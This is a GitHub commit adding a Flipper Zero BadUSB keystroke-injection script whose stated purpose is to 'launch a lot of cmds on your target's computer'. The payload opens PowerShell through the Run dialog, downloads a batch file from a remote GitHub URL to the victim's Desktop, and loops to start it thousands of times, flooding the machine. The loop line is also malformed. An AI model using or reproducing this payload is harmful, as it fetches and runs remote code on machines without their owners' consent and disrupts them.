Create start_infinite_cmd.txt

This commit is contained in:
Yann
2023-03-30 21:23:54 +02:00
committed by GitHub
parent 8b4733364c
commit bb48e8172f
+12
View File
@@ -0,0 +1,12 @@
REM Author: SeenKid (seenkid#1337 on Discord)
REM Description: Launch a lot of cmds on your target's computer
REM Version: 1.0
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/startcmd.bat -OutFile $DesktopPath/cmd.bat; while($ac -lt 9000) { Start-Process -FilePath "$DesktopPath/cmd.bat}"
DELAY 100
ENTER